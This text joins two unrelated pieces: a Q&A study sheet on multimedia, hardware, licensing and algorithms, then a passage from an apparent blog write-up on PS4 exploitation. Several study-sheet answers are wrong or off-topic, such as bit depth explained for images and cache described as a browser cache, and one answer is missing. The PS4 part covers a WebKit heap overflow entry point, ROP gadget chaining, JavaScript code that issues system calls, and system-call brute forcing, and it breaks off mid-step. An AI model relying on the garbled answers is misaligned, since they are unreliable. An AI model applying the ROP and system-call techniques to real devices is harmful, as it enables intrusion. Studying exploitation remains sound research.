sRGB is a standard RGB color space created cooperatively by HP and Microsoft in 1996 for use on monitors, printers and the Internet.
YCbCr is a family of color spaces used as a part of the color image pipeline in video and digital photography systems.(Used in ) MPEG compression, which is used in DVDs, digital TV and Video CDs, is coded in YCbCr, and digital camcorders (MiniDV, DV, Digital Betacam, etc.) output YCbCr over a digital link such as FireWire or SDI. The ITU-R BT.601 international standard for digital video defines both YCbCr and RGB color spaces
How is data encoded on audio CD-s? What is the capacity of an audio CD?
CD data is represented as tiny indentations known as "pits", encoded in a spiral track moulded into the top of the polycarbonate layer. The areas between pits are known as "lands". Each pit is approximately 100 nm (nanometre) deep by 500 nm wide, and varies from 850 nm to 3.5 µm in length. The distance between the tracks, the pitch, is 1.6 µm.
capacity of an audio CD The goal of engineers who designed audio CD was to make it possible for an audio CD to contain Beethoven's Ninth Symphony performed by London Philharmonic Orchestra. That means rougly 80 minutes of audio data. Following the points presented above, we can easily calculate the minimum data capacity for such disc:
80min×60sec/min × 44100samples/sec × 2ch × 16bitsch
That results in:
6773760000 bits=846720000 bytes≈800MB
Which is incidently the size of an average user writable CD-R disc.
What is sampling rate? What is bit depth? What is resolution?
SAMPLE RATE: Sample rate is the number of samples of audio carried per second, measured in Hz or kHz (one kHz being 1 000 Hz). For example, 44 100 samples per second can be expressed as either 44 100 Hz, or 44.1 kHz. Bandwidth is the difference between the highest and lowest frequencies carried in an audio stream
BIT DEPTH: Bit depth refers to the color information stored in an image. The higher the bit depth of an image, the more colors it can store. The simplest image, a 1 bit image, can only show two colors, black and white
RESOLUTION: Resolution is the number of pixels (individual points of color) contained on a display monitor, expressed in terms of the number of pixels on the horizontal axis and the number on the vertical axis. The sharpness of the image on a display depends on the resolution and the size of the monitor.
What is bitrate?
Bitrate is the number of bits that are conveyed or processed per unit of time.
The bit rate is quantified using the bits per second unit (symbol: "bit/s"), often in conjunction with an SI prefix such as "kilo" (1 kbit/s = 1000 bit/s), "mega" (1 Mbit/s = 1000 kbit/s), "giga" (1 Gbit/s = 1000 Mbit/s) or "tera" (1 Tbit/s = 1000 Gbit/s).[2] The non-standard abbreviation "bps" is often used to replace the standard symbol "bit/s", so that, for example, "1 Mbps" is used to mean one million bits per second.
One byte per second (1 B/s) corresponds to 8 bit/s.
What is lossy/lossless compression?
Lossless and lossy compression are terms that describe whether or not, in the compression of a file, all original data can be recovered when the file is uncompressed. With lossless compression, every single bit of data that was originally in the file remains after the file is uncompressed.
What is JPEG suitable for? Is JPEG lossy or lossless compression method?
JPEG is a standardised image compression mechanism. JPEG is designed for compressing either full-colour (24 bit) or grey-scale digital images of "natural" (real-world) scenes.
It works well on photographs, naturalistic artwork, and similar material; not so well on lettering, simple cartoons, or black-and-white line drawings (files come out very large). JPEG handles only still images, but there is a related standard called MPEG for motion pictures.
JPEG is "lossy", meaning that the image you get out of decompression isn't quite identical to what you originally put in.
What is PNG suitable for? Does PNG support compression?
as we had set it up in our Photoshop file. This will allow for some nice effects for websites and images.
Yes, PNG support compression .PNG files are lossless, which means that they do not lose quality during editing. This is unlike jpegs, where they lose quality. PNG files tend to be larger than jpegs, because they contain more information, and are lossless. PNG files do not support animation. For this purpose, a gif should be used.
How are time domain and frequency domain related in terms of signal processing? What is Fourier transform and where it is applied?
time domain (one-dimensional signals), spatial domain (multidimensional signals), frequency domain, and wavelet domains. They choose the domain in which to process a signal by making an informed assumption (or by trying different possibilities) as to which domain best represents the essential characteristics of the signal. A sequence of samples from a measuring device produces a temporal or spatial domain representation, whereas a discrete Fourier transform produces the frequency domain information, that is, the frequency spectrum. Autocorrelation is defined as the cross-correlation of the signal with itself over varying intervals of time or space.
Fourier transform and where it is applied?
Fourier transforms (FT) take a signal and express it in terms of the frequencies of the waves that make up that signal. Sound is probably the easiest thing to think about when talking about Fourier transforms.
Fourier transform methods are important in audio applications, quantum mechanics, optics, and all sorts of wave phenomena.
Microcontrollers
What distinguishes microcontroller from microprocessor?
MICROPROCESSOR | MICRO CONTROLLER |
Microprocessor is heart of Computer system. | Micro Controller is a heart of embedded system. |
It is just a processor. Memory and I/O components have to be connected externally | Micro controller has external processor along with internal memory and i/O components |
Since memory and I/O has to be connected externally, the circuit becomes large. | Since memory and I/O are present internally, the circuit is small. |
Cannot be used in compact systems and hence inefficient | Can be used in compact systems and hence it is an efficient technique |
Cost of the entire system increases | Cost of the entire system is low |
Due to external components, the entire power consumption is high. Hence it is not suitable to used with devices running on stored power like batteries. | Since external components are low, total power consumption is less and can be used with devices running on stored power like batteries. |
Most of the microprocessors do not have power saving features. | Most of the micro controllers have power saving modes like idle mode and power saving mode. This helps to reduce power consumption even further. |
Since memory and I/O components are all external, each instruction will need external operation, hence it is relatively slower. | Since components are internal, most of the operations are internal instruction, hence speed is fast. |
Microprocessor have less number of registers, hence more operations are memory based. | Micro controller have more number of registers, hence the programs are easier to write. |
Microprocessors are based on von Neumann model/architecture where program and data are stored in same memory module | Micro controllers are based on Harvard architecture where program memory and Data memory are separate |
Mainly used in personal computers | Used mainly in washing machine, MP3 players |
What are the differences between Harvard architecture and von Neumann architecture?
Difference of von Neumann architecture from Harvard is that von Neumann can do a single operation at a time -- it cannot write while reading an instruction. A property that a computer with Harvard architecture can do.
What is an interrupt?
Interrupt is a signal that there is something that requires immediate attention from the processing unit. Processor suspends its current activities, saves its state, deals with the temporary interrupt and returns itself to the previous state.
What is an timer?
Timer is a line of code that tracks the passage of time based on the clock oscillator which is built in to the hardware where the software is running.
Hardware description language
What are the uses for hardware description languages?
In electronics, a hardware description language (HDL) is a specialized computer language used to program the structure, design and operation of electronic circuits, and most commonly, digital logic circuits.
A hardware description language enables a precise, formal description of an electronic circuit that allows for the automated analysis, simulation, and simulated testing of an electronic circuit. It also allows for the compilation of an HDL program into a lower level specification of physical electronic components, such as the set of masks used to create an integrated circuit.
A hardware description language looks much like a programming language such as C; it is a textual description consisting of expressions, statements and control structures. One important difference between most programming languages and HDLs is that HDLs explicitly include the notion of time.
What is latch?
A latch is an example of a bistable multivibrator, that is, a device with exactly two stable states. These states are high-output and low-output. A latch has a feedback path, so information can be retained by the device. Therefore latches can be memory devices, and can store one bit of data for as long as the device is powered. As the name suggests, latches are used to "latch onto" information and hold in place. Latches are very similar to flip-flops, but are not synchronous devices, and do not operate on clock edges as flip-flops do.
What is flip-flop?
A flip-flop is a device very like a latch in that it is a bistable multivibrator, having two states and a feedback path that allows it to store a bit of information. The difference between a latch and a flip-flop is that a latch is asynchronous, and the outputs can change as soon as the inputs do (or at least after a small propagation delay). A flip-flop, on the other hand, is edge-triggered and only changes state when a control signal goes from high to low or low to high. This distinction is relatively recent and is not formal, with many authorities still referring to flip-flops as latches and vice versa, but it is a helpful distinction to make for the sake of clarity.
There are several different types of flip-flop each with its own uses and peculiarities. The four main types of flip-flop are : SR, JK, D, and T.
What is mux (multiplexer)?
A multiplexer (or mux) is a device that selects one of several analog or digital input signals and forwards the selected input into a single line.[1] A multiplexer of 2n inputs has n select lines, which are used to select which input line to send to the output.[2] Multiplexers are mainly used to increase the amount of data that can be sent over the network within a certain amount of time and bandwidth.[1] A multiplexer is also called a data selector.
An electronic multiplexer makes it possible for several signals to share one device or resource, for example one A/D converter or one communication line, instead of having one device per input signal.
What is register? Register file?
Registers are a special, high-speed storage area within the CPU. All data must be represented in a register before it can be processed. For example, if two numbers are to be multiplied, both numbers must be in registers, and the result is also placed in a register. A register may hold a computer instruction , a storage address, or any kind of data (such as a bit sequence or individual characters). A register must be large enough to hold an instruction - for example, in a 32-bit instruction computer, a register must be 32 bits in length. In some computer designs, there are smaller registers - for example, half-registers - for shorter instructions. Depending on the processor design and language rules, registers may be numbered or have arbitrary names.
A register file is an array of processor registers in a central processing unit (CPU). Modern integrated circuit-based register files are usually implemented by way of fast static RAMs with multiple ports. Such RAMs are distinguished by having dedicated read and write ports, whereas ordinary multiported SRAMs will usually read and write through the same ports.
The instruction set architecture of a CPU will almost always define a set of registers which are used to stage data between memory and the functional units on the chip. In simpler CPUs, these architectural registers correspond one-for-one to the entries in a physical register file within the CPU. More complicated CPUs use register renaming, so that the mapping of which physical entry stores a particular architectural register changes dynamically during execution. The register file is part of the architecture and visible to the programmer, as opposed to the concept of transparent caches.
What is ALU?
An arithmetic logic unit (ALU) is a digital electronic circuit that performs arithmetic and bitwise logical operations on integer binary numbers. This is in contrast to a floating-point unit (FPU), which operates on floating point numbers. An ALU is a fundamental building block of many types of computing circuits, including the central processing unit (CPU) of computers, FPUs, and graphics processing units (GPUs). A single CPU, FPU or GPU may contain multiple ALUs.
The inputs to an ALU are the data to be operated on, called operands, and a code indicating the operation to be performed; the ALU's output is the result of the performed operation. In many designs, the ALU also exchanges additional information with a status register, which relates to the result of the current or previous operations.
What is floating-point unit?
A floating-point unit (FPU) is a part of a computer system specially designed to carry out operations on floating point numbers. Typical operations are addition, subtraction, multiplication, division, square root, and bitshifting. Some systems (particularly older, microcode-based architectures) can also perform various transcendental functions such as exponential or trigonometric calculations, though in most modern processors these are done with software library routines.
In general purpose computer architectures, one or more FPUs may be integrated with the central processing unit; however many embedded processors do not have hardware support for floating-point operations.
What is a cache?
Clearing Computer Cache. The cache (pronounced "cash") is a space in your computer's hard drive and in RAM memory where your browser saves copies of previously visited Web pages. Your browser uses the cache like a short-term memory
What is a bus?
In computer architecture, a bus (related to the Latin "omnibus", meaning "for all") is a communication system that transfers data between components inside a computer, or between computers.
Publishing work
What are the major implications of MIT, BSD and GPL licenses?
The MIT License is a free software license originating at the Massachusetts Institute of Technology (MIT) the Berkeley Software Distribution (BSD) GPL General Public License
What are the differences between copyright, trademark, trade secret?
“Intellectual property is something that is created by the mind.” Typically, we think of ideas as being created by the mind – but intellectual property does not protect bare ideas: rather, it is the expression or symbolic power/recognizability of the ideas that are protected. Thus, it is the design of the rocket that is patented, not the idea of a rocket. It is the painting of the lake that is copyrighted, not the idea of a lake. And it is the consumer recognizable logo that is trademarked, not the idea of a logo. Intellectual property protects how we express and identify ideas in concrete ways – not the idea itself.
In particular:
Patents: protect functional expressions of an idea – not the idea itself. A machines, method/process, manufacture, compositions of matter, and improvements of any of these items can be patented. Thus, I can patent a design for the nozzle on a rocket, or the method of making the rocket, or the method of making the rocket fuel, or the metal in which the rocket fuel is stored, or a new way of transporting the rocket fuel to the rocket. But I cannot patent the broad “idea” of a rocket.
Copyrights: protect the specific creative expression of an idea through any medium of artistic/creative expression – i.e., paintings, photographs, sculpture, writings, software, etc. A copyright protects your painting of a haystack, but it would not prohibit another painter from expressing their artistry or viewpoint by also painting a haystack. Likewise, while Ian Fleming was able to receive a copyright on his particular expression of the idea of a secret agent (i.e., a debonair English secret agent), he could not prevent Rich Wilkes from receiving a copyright on his expression of the idea of a secret agent (i.e., a tattooed bald extreme athlete turned reluctant secret agent).
Trademarks: protect any symbol that indicates the source or origin of the goods or services to which it is affixed. While a trademark can be extremely valuable to its owner, the ultimate purpose of a trademark is to protect consumers – that is, the function of a trademark is to inform the consumer where the goods or services originate. The consumer, knowing the origin of the goods, can make purchasing decisions based on prior knowledge, reputation or marketing.
Trade secret: is a formula, practice, process, design, instrument, pattern, commercial method, or compilation of information which is not generally known or reasonably ascertainable by others, and by which a business can obtain an economic advantage over competitors or customers.[
While each category is distinct, a product (or components/aspects of a product) may fall into one or more of the categories. For example, software can be protected by both patents and copyrights. The copyright would protect the artistic expression of the idea – i.e., the code itself – while the patent would protect the functional expression of the idea – e.g., using a single click to purchase a book online. Likewise, it is likely that the software company will use a trademark to indicate who made the software.
An additional example would be a logo for a company. The logo may serve as a trademark indicating that all products affixed with the logo are from the same source. The creative and artistic aspects of the logo may also be protected by a copyright.
Where would you use waterfall software development model? Where would you use agile?
This is a sequential model, used to create different kinds of software, where project development is seen as flowing steadily downwards (like a waterfall) through the phases of software development requirements analysis, UI design, software implementation, project verification and software maintenance. The process itself can be divided into different phases, depending on the IT project or other web development requirements.
Where would you use agile?
We want to use agile when we are doing something that is new, or at least new to the team building it. If it's something the team has done before over and over then the team probably doesn't need an agile approach.
To my mind, this is where some of the manufacturing analogies come in. If we are building the same car day after day, we learn pretty quickly all the nuances of building that car. We don't need an agile approach because the novelty of the situation is low. Novelty alone does not mean we should use an agile process.
What is the purpose of a version control system?
A version control system (also known as a Revision Control System) is a repository of files, often the files for the source code of computer programs, with monitored access. Every change made to the source is tracked, along with who made the change, why they made it, and references to problems fixed, or enhancements introduced, by the change.
Version control systems are essential for any form of distributed, collaborative development. Whether it is the history of a wiki page or large software development project, the ability to track each change as it was made, and to reverse changes when necessary can make all the difference between a well managed and controlled process and an uncontrolled ‘first come, first served’ system. It can also serve as a mechanism for due diligence for software projects.
What would you store in a version control system?
The main purpose of a version control is to store a set of files, as well as the history of changes made to those files.[2] Exactly how each revision control system handles storing those changes, however, differs greatly: for instance, Subversion has in the past relied on a database instance and has since moved to storing its changes directly on the filesystem.[3] These differences in methodology have generally led to diverse uses of revision control by different groups, depending on their needs
Algorithms and data structures
What is time complexity of algorithm?
In computer science, the time complexity of an algorithm quantifies the amount of time taken by an algorithm to run as a function of the length of the string representing the input. Time complexity is commonly estimated by counting the number of elementary operations performed by the algorithm, where an elementary operation takes a fixed amount of time to perform.
What is space complexity of algorithm?
Space complexity is a measure of the amount of working storage an algorithm needs. That means how much memory, in the worst case, is needed at any point in the algorithm. It represents the total amount of memory space that a "normal" physical computer would need to solve a given computational problem with a given algorithm.
What's a good algorithm?
It executes as fast as possible. It takes as less space as possible. It is adaptable to computers. It is simple. It is elegant (well written).
History
What is Moore's law? What is Rock's law?
Moore's law is the observation that the number of transistors in a dense integrated circuit doubles approximately every two years. The observation is named after Gordon E. Moore, the co-founder of Intel and Fairchild Semiconductor, whose 1965 paper described a doubling every year in the number of components per integrated circuit, and projected this rate of growth would continue for at least another decade. In 1975, looking forward to the next decade, he revised the forecast to doubling every two years. Rock's law or Moore's second law, named for Arthur Rock or Gordon Moore, says that the cost of a semiconductor chip fabrication plant doubles every four years. As of 2015, the price had already reached about 14 billion US dollars.
What were the major contributing factors for success of Microsoft, Apple, Google, <your favourite company>?
What were the major contributing factors to the success of Silicon Valley?
PS4
Introduction
Since there haven't been any major public announcements regarding PS4 hacking for a long time now, I wanted to explain a bit about how far PS4 hacking has come, and what is preventing further progression.
I will explain some security concepts that generally apply to all modern systems, and the discoveries that I have made from running ROP tests on my PS4.
If you are not particularly familiar with exploitation, you should read my article about exploiting DS games through stack smash vulnerabilities in save files first.
You may download my complete setup here to run these tests yourself; it is currently for firmware 1.76 only.
Background information about the PS4
As you probably know the PS4 features a custom AMD x86-64 CPU (8 cores), and there are loads of research available for this CPU architecture, even if this specific version might deviate slightly from known standards. For example, PFLA (Page Fault Liberation Army) released a proof of concept implementing a complete Turing machine using only page faults and the x86 MMU during the 29C3 congress, check their awesome video over at YouTube. Also interesting if you are trying to run code within a virtual machine and want to execute instructions on the host CPU. - EurAsia news article 3251
As well as having a well documented CPU architecture, much of the software used in the PS4 is open source.
Most notably, the PS4's Orbis OS is based on FreeBSD, just like the PS3's OS was (with parts of NetBSD as well); but as well as FreeBSD 9.0, other noticable software used includes Mono VM, and WebKit.
WebKit entry point
WebKit is the open source layout engine which renders web pages in the browsers for iOS, Wii U, 3DS, PS Vita, and the PS4.
Although so widely used and mature, WebKit does have its share of vulnerabilities; you can learn about most of them by reading Pwn2Own write-ups.
In particular, the browser in PS4 firmware 1.76 uses a version of WebKit which is vulnerable to CVE-2012-3748, a heap-based buffer overflow in the JSArray::sort(...) method.
In 2014, nas and Proxima announced that they had successfully been able to port this exploit to the PS4's browser, and released the PoC code publicly as the first entry point into hacking the PS4.
This gives us arbitrary read and write access to everything the WebKit process can read and write to, which can be used to dump modules, and overwrite return addresses on the stack, letting us control the Program Counter (for ROP).
Since then, many other vulnerabilities have been found in WebKit, which could probably allow for module dumping and ROP on later firmwares of the PS4, but as of writing, no one has ported any of these exploits to the PS4 publicly.
What is ROP?
Unlike in primitive devices like the DS, the PS4 has a kernel which controls the properties of different areas of memory. Pages of memory which are marked as executable cannot be overwritten, and pages of memory which are marked as writable cannot be executed; this is known as Data Execution Prevention (DEP).
This means that we can't just copy a payload into memory and execute it. However, we can execute code that is already loaded into memory and marked as executable.
It wouldn't be very useful to jump to a single address if we can't write our own code to that address, so we use ROP.
Return-Oriented Programming (ROP) is just an extension to traditional stack smashing, but instead of overwriting only a single value which the PC will jump to, we can chain together many different addresses, known as gadgets.
A gadget is usually just a single desired instruction followed by a ret.
In x86_64 assembly, when a ret instruction is reached, a 64bit value is popped off the stack and the PC jumps to it; since we can control the stack, we can make every ret instruction jump to the next desired gadget.
For example, from 0x80000 may contains instructions:
mov rax, 0 ret And from 0x90000 may contain instructions:
mov rbx, 0 ret If we overwrite a return address on the stack to contain 0x80000 followed by 0x90000, then as soon as the first ret instruction is reached execution will jump to mov rax, 0, and immediately afterwards, the next ret instruction will pop 0x90000 off the stack and jump to mov rbx, 0.
Effectively this chain will set both rax and rbx to 0, just as if we had written the code into a single location and executed it from there.
ROP chains aren't just limited to a list of addresses though; assuming that from 0xa0000 contains these instructions:
pop rax ret We can set the first item in the chain to 0xa0000 and the next item to any desired value for rax.
Gadgets also don't have to end in a ret instruction; we can use gadgets ending in a jmp:
add rax, 8 jmp rcx By making rcx point to a ret instruction, the chain will continue as normal:
chain.add("pop rcx", "ret"); chain.add("add rax, 8; jmp rcx"); Sometimes you won't be able to find the exact gadget that you need on its own, but with other instructions after it. For example, if you want to set r8 to something, but only have this gadget, you will have to set r9 to some dummy value:
pop r8 pop r9 ret Although you may have to be creative with how you write ROP chains, it is generally accepted that within a sufficiently large enough code dump, there will be enough gadgets for Turing-complete functionality; this makes ROP a viable method of bypassing DEP.
Finding gadgets
Think of ROP as writing a new chapter to a book, using only words that have appeared at the end of sentences in the previous chapters.
It's obvious from the structure of most sentences that we probably won't be able to find words like 'and' or 'but' appearing at the end of any sentences, but we will need these connectives in order to write anything meaningful.
It is quite possible however, that a sentence has ended with 'sand'. Although the author only ever intended for the word to be read from the 's', if we start reading from the 'a', it will appear as an entirely different word by coincidence, 'and'.
These principles also apply to ROP.
Since the structure of almost all functions follows something like this:
- Save registers
push rbp mov rbp, rsp push r15 push r14 push r13 push r12 push rbx sub rsp, 18h
- Function body
- Restore registers
add rsp, 18h pop rbx pop r12 pop r13 pop r14 pop r15 pop rbp ret You'd expect to only be able to find pop gadgets, or more rarely, something like xor rax, rax to set the return value to 0 before returning.
Having a comparison like:
cmp [rax], r12 ret Wouldn't make any sense since the result of the comparison isn't used by the function. However, there is still a possibility that we can find gadgets like these.
x86_64 instructions are similar to words in that they variable lengths, and can mean something entirely different depending on where decoding starts.
The x86_64 architecture is a variable-length CISC instruction set. Return-oriented programming on the x86_64 takes advantage of the fact that the instruction set is very "dense", that is, any random sequence of bytes is likely to be interpretable as some valid set of x86_64 instructions. - Wikipedia
To demonstrate this, take a look at the end of this function from the WebKit module:
000000000052BE0D mov eax, [rdx+8] 000000000052BE10 mov [rsi+10h], eax 000000000052BE13 or byte ptr [rsi+39h], 20h 000000000052BE17 ret Now take a look at what the code looks like if we start decoding from 0x52be14:
000000000052BE14 cmp [rax], r12 000000000052BE17 ret Even though this code was never intended to be executed, it is within an area of memory which has been marked as executable, so it is perfectly valid to use as a gadget.
Of course, it would be incredibily time consuming to look at every possible way of interpreting code before every single ret instruction manually; and that's why tools exist to do this for you. The one which I use to search for ROP gadgets is rp++; to generate a text file filled with gadgets, just use:
rp-win-x64 -f mod14.bin --raw=x64 --rop=1 --unique > mod14.txt
Segmentation faults
If we do try to execute a non-executable page of memory, or try to write to a non-writable page of memory, a segmentation fault will occur.
For example, trying to execute code on the stack, which is mapped as read and write only:
setU8to(chain.data + 0, 0xeb); setU8to(chain.data + 1, 0xfe);
chain.add(chain.data); And trying to write to code, which is mapped as read and execute only:
setU8to(moduleBases[webkit], 0); If a segmentation fault occurs, a message saying "There is not enough free system memory" will appear, and the page will fail to load:
There are other possible reasons for this message to be displayed, such as executing an invalid instruction or an unimplemented system call, but a segmentation fault is the most common.
ASLR
Address Space Layout Randomization (ASLR) is a security technique which causes the base addresses of modules to be different every time you start the PS4.
It has been reported to me that very old firmwares (1.05) don't have ASLR enabled, but it was introduced sometime before firmware 1.70. Note that kernel ASLR is not enabled (for firmwares 1.76 and lower at least), which will be proved later in the article.
For most exploits ASLR would be a problem because if you don't know the addresses of the gadgets in memory, you would have no idea what to write to the stack.
Luckily for us, we aren't limited to just writing static ROP chains. We can use JavaScript to read the modules table, which will tell us the base addresses of all loaded modules. Using these bases, we can then calculate the addresses of all our gadgets before we trigger ROP execution, bypassing ASLR.
The modules table also includes the filenames of the modules:
WebProcess.self libkernel.sprx libSceLibcInternal.sprx libSceSysmodule.sprx libSceNet.sprx libSceNetCtl.sprx libSceIpmi.sprx libSceMbus.sprx libSceRegMgr.sprx libSceRtc.sprx libScePad.sprx libSceVideoOut.sprx libScePigletv2VSH.sprx libSceOrbisCompat.sprx libSceWebKit2.sprx libSceSysCore.sprx libSceSsl.sprx libSceVideoCoreServerInterface.sprx libSceSystemService.sprx libSceCompositeExt.sprx Although the PS4 predominantly uses the [Signed] PPU Relocatable Executable ([S]PRX) format for modules, some string references to [Signed] Executable and Linking Format ([S]ELF) object files can also be found in the libSceSysmodule.sprx dump, such as bdj.elf, web_core.elf and orbis-jsc-compiler.self. This combination of modules and objects is similar to what is used in the PSP and PS3.
You can view a complete list of all modules available (not just those loaded by the browser) in libSceSysmodule.sprx. We can load and dump some of these through several of Sony's custom system calls, which will be explained later in this article.
JuSt-ROP
Using JavaScript to write and execute dynamic ROP chains gives us a tremendous advantage over a standard buffer overflow attack.
As well as bypassing ASLR, we can also read the user agent of the browser, and provide a different ROP chain for different browser versions, giving our exploit the highest compatibility possible.
We can even use JavaScript to read the memory at our gadgets' addresses to check that they are correct, giving us almost perfect reliability.
Writing ROP chains dynamically, rather than generating them with a script beforehand, just makes sense.
I created a JavaScript framework for writing ROP chains, JuSt-ROP, for this very reason.
JavaScript caveats
JavaScript represents numbers using the IEEE-754 double-precision (64bit) format. This provides us with 53bit precision, meaning that it isn't possible to represent every 64bit value, approximations will have to be used for some.
If you just need to set a 64bit value to something low, like 256, then setU64to will be fine.
But for situations in which you need to write a buffer or struct of data, there is the possibility that certain bytes will be written incorrectly if it has been written in 64bit chunks.
Instead, you should write data in 32bit chunks (remembering that the PS4 is little endian), to ensure that every byte is exact.
System calls
Interestingly, the PS4 uses the same calling convention as Linux and MS-DOS for system calls, with arguments stored in registers, rather than the traditional UNIX way (which FreeBSD uses by default), with arguments stored in the stack:
rax - System call number rdi - Argument 1 rsi - Argument 2 rdx - Argument 3 r10 - Argument 4 r8 - Argument 5 r9 - Argument 6 We can try to perform any system call with the following JuSt-ROP method:
this.syscall = function(name, systemCallNumber, arg1, arg2, arg3, arg4, arg5, arg6) { console.log("syscall " + name);
this.add("pop rax", systemCallNumber); if(typeof(arg1) !== "undefined") this.add("pop rdi", arg1); if(typeof(arg2) !== "undefined") this.add("pop rsi", arg2); if(typeof(arg3) !== "undefined") this.add("pop rdx", arg3); if(typeof(arg4) !== "undefined") this.add("pop rcx", arg4); if(typeof(arg5) !== "undefined") this.add("pop r8", arg5); if(typeof(arg6) !== "undefined") this.add("pop r9", arg6); this.add("mov r10, rcx; syscall"); } Just make sure to set the stack base to some free memory beforehand:
this.add("pop rbp", stackBase + returnAddress + 0x1400); Using system calls can tell us a huge amount about the PS4 kernel. Not only that, but using system calls is most likely the only way that we can interact with the kernel, and thus potentially trigger a kernel exploit.
If you are reverse engineering modules to identify some of Sony's custom system calls, you may come across an alternative calling convention:
Sometimes Sony performs system calls through regular system call 0 (which usually does nothing in FreeBSD), with the first argument (rdi) controlling which system call should be executed:
rax - 0 rdi - System call number rsi - Argument 1 rdx - Argument 2 r10 - Argument 3 r8 - Argument 4 r9 - Argument 5 It is likely that Sony did this to have easy compatibility with the function calling convention. For example:
.global syscall syscall: xor rax, rax mov r10, rcx syscall ret Using this, they can perform system calls from C using the function calling convention:
int syscall();
int getpid(void) { return syscall(20); } When writing ROP chains, we can use either convention:
// Both will get the current process ID: chain.syscall("getpid", 20); chain.syscall("getpid", 0, 20); It's good to be aware of this, because we can use whichever one is more convenient for the gadgets that are available.
getpid
Just by using system call 20, getpid(void), we can learn a lot about the kernel.
The very fact that this system call works at all tells us that Sony didn't bother mixing up the system call numbers as a means of security through obscurity (under the BSD license they could have done this without releasing the new system call numbers).
So, we automatically have a list of system calls in the PS4 kernel to try.
Secondly, by calling getpid(), restarting the browser, and calling it again, we get a return value 2 higher than the previous value.
This tells us that the Internet Browser app actually consists of 2 separate processes: the WebKit core (which we take over), that handles parsing HTML and CSS, decoding images, and executing JavaScript for example, and another one to handle everything else: displaying graphics, receiving controller input, managing history and bookmarks, etc.
Also, although FreeBSD has supported PID randomisation since 4.0, sequential PID allocation is the default behaviour.
The fact that PID allocation is set to the default behaviour indicates that Sony likely didn't bother adding any additional security enhancements such as those encouraged by projects like HardenedBSD.
How many custom system calls are there?
The last standard FreeBSD 9 system call is wait6, number 532; anything higher than this must be a custom Sony system call.
Invoking most of Sony's custom system calls without the correct arguments will return error 0x16, "Invalid argument"; however, any compatibility or unimplemented system calls will report the "There is not enough free system memory" error.
Through trial and error, I have found that system call number 617 is the last Sony system call, anything higher is unimplemented.
From this, we can conclude that there are 85 custom Sony system calls in the PS4's kernel (617 - 532).
This is significantly less than the PS3, which had almost 1000 system calls in total. This indicates that we have fewer possible attack vectors, but that it may be easier to document all of the system calls.
Furthermore, 9 of these 85 system calls always return 0x4e, ENOSYS, which suggests that they may only be callable from development units, leaving us with just 76 which are usable.
Of these 76, only 45 are referenced by libkernel.sprx (which all non-core applications use to perform system calls), so developers only have 45 custom system calls which they can use.
Interestingly, although only 45 are intended to be called (because libkernel.sprx has wrappers for them), some of the other 31 are still callable from the Internet Browser process. It is more likely for these unintended system calls to have vulnerabilities in them, since they have probably had the least amount of testing.
libkernel.sprx
To identify how custom system calls are used by libkernel, you must first remember that it is just a modification of the standard FreeBSD 9.0 libraries.
Here's an extract of _libpthread_init from thr_init.c:
/*
* Check for the special case of this process running as * or in place of init as pid = 1: */
if ((_thr_pid = getpid()) == 1) { /* * Setup a new session for this process which is * assumed to be running as root. */ if (setsid() == -1) PANIC("Can't set session ID"); if (revoke(_PATH_CONSOLE) != 0) PANIC("Can't revoke console"); if ((fd = __sys_open(_PATH_CONSOLE, O_RDWR)) < 0) PANIC("Can't open console"); if (setlogin("root") == -1) PANIC("Can't set login to root"); if (_ioctl(fd, TIOCSCTTY, (char *) NULL) == -1) PANIC("Can't set controlling terminal"); } The same function can be found at offset 0x215F0 from libkernel.sprx. This is how the above extract looks from within a libkernel dump:
call getpid mov cs:dword_5B638, eax cmp eax, 1 jnz short loc_2169F
call setsid cmp eax, 0FFFFFFFFh jz loc_21A0C
lea rdi, aDevConsole ; "/dev/console" call revoke test eax, eax jnz loc_21A24
lea rdi, aDevConsole ; "/dev/console" mov esi, 2 xor al, al call open
mov r14d, eax test r14d, r14d js loc_21A3C lea rdi, aRoot ; "root" call setlogin cmp eax, 0FFFFFFFFh jz loc_21A54
mov edi, r14d mov esi, 20007461h xor edx, edx xor al, al call ioctl cmp eax, 0FFFFFFFFh jz loc_21A6C
Reversing module dumps to analyse system calls
libkernel isn't completely open source though; there's also a lot of custom code which can help disclose some of Sony's system calls.
Although this process will vary depending on the system call you are looking up; for some, it is fairly easy to get a basic understanding of the arguments that are passed to it.
The system call wrapper will be declared somewhere in libkernel.sprx, and will almost always follow this template:
000000000000DB70 syscall_601 proc near 000000000000DB70 mov rax, 259h 000000000000DB77 mov r10, rcx 000000000000DB7A syscall 000000000000DB7C jb short error 000000000000DB7E retn 000000000000DB7F 000000000000DB7F error: 000000000000DB7F lea rcx, sub_DF60 000000000000DB86 jmp rcx 000000000000DB86 syscall_601 endp Note that the mov r10, rcx instruction doesn't necessarily mean that the system call takes at least 4 arguments; all system call wrappers have it, even those that take no arguments, such as getpid.
Once you've found the wrapper, you can look up xrefs to it:
0000000000011D50 mov edi, 10h 0000000000011D55 xor esi, esi 0000000000011D57 mov edx, 1 0000000000011D5C call syscall_601 0000000000011D61 test eax, eax 0000000000011D63 jz short loc_11D6A It's good to look up several of these, just to make sure that the registers weren't modified for something unrelated:
0000000000011A28 mov edi, 9 0000000000011A2D xor esi, esi 0000000000011A2F xor edx, edx 0000000000011A31 call syscall_601 0000000000011A36 test eax, eax 0000000000011A38 jz short loc_11A3F Consistently, the first three registers of the system call convention (rdi, rsi, and rdx) are modified before invoking the call, so we can conclude with reasonable confidence that it takes 3 arguments.
For clarity, this is how we would replicate the calls in JuSt-ROP:
chain.syscall("unknown", 601, 0x10, 0, 1); chain.syscall("unknown", 601, 9, 0, 0); As with most system calls, it will return 0 on success, as seen by the jz conditional after testing the return value.
Looking up anything beyond than the amount of arguments will require a much more in-depth analysis of the code before and after the call to understand the context, but this should help you get started.
Brute forcing system calls
Although reverse engineering module dumps is the most reliable way to identify system calls, some aren't referenced at all in the dumps we have so we will need to analyse them blindly.
If we guess that a certain system call might take a particular set of arguments, we can brute force all system calls which return a certain value (0 for success) with the arguments that we chose, and ignore all which returned an error.
We can also pass 0s for all arguments, and brute force all system calls which return useful errors such as 0xe, "Bad address", which would indicate that they take at least one pointer.
Firstly, we will need to execute the ROP chain as soon as the page loads. We can do this by attaching our function to the body element's onload:
<body onload="exploit()"> Next we will need to perform a specific system call depending on an HTTP GET value. Although this can be done with JavaScript, I will demonstrate how to do this using PHP for simplicity:
